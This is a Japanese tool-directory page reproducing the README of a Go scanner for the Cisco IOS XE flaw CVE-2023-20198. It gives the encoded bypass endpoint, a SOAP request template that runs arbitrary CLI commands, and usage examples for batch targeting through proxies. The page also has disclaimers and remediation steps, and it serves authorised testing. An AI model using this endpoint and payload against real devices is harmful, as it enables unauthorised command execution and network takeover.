Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cisco-cve-2023-20198-checker — Cisco IOS XEデバイスにおけるCVE-2023-20198を検出するためのGoベースの脆弱性スキャナー。リモートコード実行のためにSOAP/XMLインターフェース(WSMA)をテストし、バッチスキャンとHTMLレポート生成機能を備えています。 | Kitploit
ツール/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ネットワークセキュリティペネトレーションテストコマンド&コントロール
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Cisco IOS XEデバイスにおけるCVE-2023-20198を検出するためのGoベースの脆弱性スキャナー。リモートコード実行のためにSOAP/XMLインターフェース(WSMA)をテストし、バッチスキャンとHTMLレポート生成機能を備えています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
5ヶ月前未レビュー

Cisco CVE-2023-20198 チェッカー

Go Version License Platform

Cisco IOS XE デバイスにおける CVE-2023-20198 を検出するためのプロフェッショナルな脆弱性スキャナーです。脆弱な SOAP/XML インターフェース (WSMA) をテストします。許可されたセキュリティ評価およびネットワーク監査向けに設計されています。

⚠️ 法的免責事項

許可されたセキュリティテストのみに使用

このツールは以下に限定して使用されます:

  • 許可された脆弱性スキャン
  • 明示的な書面による同意を得たセキュリティ監査
  • ネットワークセキュリティ評価
  • 管理されたラボ環境での教育目的
  • コンプライアンスおよびペネトレーションテスト

コンピュータシステムへの不正アクセスは違法です。システムをテストする前に必ず適切な許可を得てください。


🚀 クイックスタート

インストール

go install の使用 (推奨)

root@kitploit:~
go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

バイナリは $GOPATH/bin ディレクトリ (通常は ~/go/bin) にインストールされます。

手動インストール

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# ビルド
go build -o cisco-cve-2023-20198-checker

# インストール (オプション)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

基本的な使用方法

root@kitploit:~
# 単一ターゲットのチェック
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# 複数ターゲットのチェック
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# HTML レポートの生成
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 機能

  • ✅ 脆弱性検出 - CVE-2023-20198 (WSMA RCE) をテスト
  • ✅ 単一およびバッチターゲットスキャン
  • ✅ カスタムポート対応 (デフォルト: 443)
  • ✅ SOAP/XML 経由でのコマンド実行
  • ✅ プロフェッショナルな HTML レポート生成
  • ✅ 外部依存関係ゼロ
  • ✅ クロスプラットフォーム (Linux, macOS, Windows)
  • ✅ SSL/TLS 証明書スキップオプション
  • ✅ 設定可能なタイムアウト
  • ✅ プロキシ対応 (HTTP, HTTPS, SOCKS5)
  • ✅ 認証プロキシ対応
  • ✅ 環境変数対応 (HTTP_PROXY, HTTPS_PROXY)

🌐 プロキシ対応

企業環境に最適!以下をサポート:

  • HTTP/HTTPS プロキシ
  • SOCKS5 プロキシ (SSH トンネル, Tor)
  • 認証プロキシ
  • 環境変数
root@kitploit:~
# HTTP プロキシ
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH トンネル)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# 環境変数
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

詳細なプロキシ設定については PROXY_GUIDE.md を参照してください。


💻 コマンドラインオプション


📖 使用例

単一ターゲットテスト

root@kitploit:~
# 基本的な脆弱性チェック
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# カスタムポート
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# 特定のコマンドを実行
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# レポート生成
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

バッチテスト

root@kitploit:~
# ターゲットファイルを作成
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# 全ターゲットをテスト
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# バッチで HTML レポート生成
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

高度なコマンド

root@kitploit:~
# ネットワーク情報の列挙
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# バージョン検出
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# HTTP プロキシ経由
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 プロキシ経由 (SSH トンネル)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# 認証プロキシ
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 CVE-2023-20198 について

脆弱性の詳細

CVE ID: CVE-2023-20198
CVSS スコア: 10.0 (クリティカル)
タイプ: リモートコード実行 (RCE)
影響を受けるもの: Cisco IOS XE Web UI (WSMA)

技術的詳細

  • エンドポイント: /%2577ebui_wsma_https (パスエンコーディングバイパス)
  • プロトコル: HTTPS 上の SOAP 1.1
  • 認証: WS-Security UsernameToken (有効な認証情報が必要)
  • 名前空間: urn:cisco:wsma-exec
  • 影響: 有効な認証情報があればデバイス全体が侵害される可能性

SOAP リクエスト構造

root@kitploit:~
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ 修復策

システム管理者向け

デバイスが脆弱な場合:

1. WSMA を無効にする (不要な場合)

root@kitploit:~
no ip http server
no ip http secure-server

2. ACL でアクセスを制限する

root@kitploit:~
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. ファームウェアの更新 - 最新の Cisco セキュリティパッチを適用

4. 強力な認証を有効にする

root@kitploit:~
aaa new-model
aaa authentication login default group tacacs+ local

5. ログの監視 - 不審な SOAP/HTTP アクティビティを確認


🏗️ ソースからのビルド

前提条件

  • Go 1.21 以上

ビルド

root@kitploit:~
# 標準ビルド
go build -o cisco-cve-2023-20198-checker

# 最適化 (より小さいバイナリ)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# 異なるプラットフォーム向けクロスコンパイル
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 出力例

ターミナル出力

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     Cisco SOAP/XML Security Checker                       ║
║     Educational & Authorized Security Assessment Only     ║
╚═══════════════════════════════════════════════════════════╝

[*] Command: show version
[*] Port: 443
[*] Timeout: 10 seconds

[1/1] Testing target: 192.168.1.100:443
[*] Sending SOAP request...
[+] Response received (Status: 200)
[+] Success!

╔═══════════════════════════════════════════════════════════╗
║                    BATCH RESULTS                          ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - SUCCESS
Cisco IOS XE Software, Version 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      SUMMARY                              ║
╚═══════════════════════════════════════════════════════════╝
Total Targets: 1
Successful: 1
Failed: 0

HTML レポート

プロフェッショナルなセキュリティ評価レポート:

  • 統計ダッシュボード
  • 詳細な設定情報
  • コマンド出力 (端末スタイル)
  • 技術的メタデータ
  • 法的免責事項

🤝 コントリビューション

コントリビューション歓迎!以下の手順でお願いします:

  1. リポジトリをフォーク
  2. フィーチャーブランチを作成
  3. 変更を加える
  4. プルリクエストを送信

📝 ライセンス

MIT ライセンス - LICENSE ファイルを参照


🔗 参考リンク

  • Cisco セキュリティ勧告
  • CVE-2023-20198 詳細
  • OWASP API セキュリティ

⚖️ 責任ある開示

このツールは許可された脆弱性スキャンのみを目的としています。作成者は誤用について責任を負いません。所有していないシステムをテストする前に、必ず書面による許可を取得してください。


セキュリティコミュニティのために作成されました 🛡️

ツールをダウンロード
フラグ型デフォルト説明
-targetstring-単一ターゲットの IP/ホスト名
-targets-filestring-ターゲットリストファイル (1行1ターゲット)
-portint443HTTPS/SOAP ポート
-usernamestringadminSOAP ユーザー名
-passwordstring-必須。SOAP パスワード
-commandstringuname -a実行するコマンド
-htmlboolfalseHTML レポートを生成
-timeoutint10リクエストタイムアウト (秒)
-skip-verifybooltrueSSL 検証をスキップ
-proxystring-プロキシ URL (http://, https://, socks5://)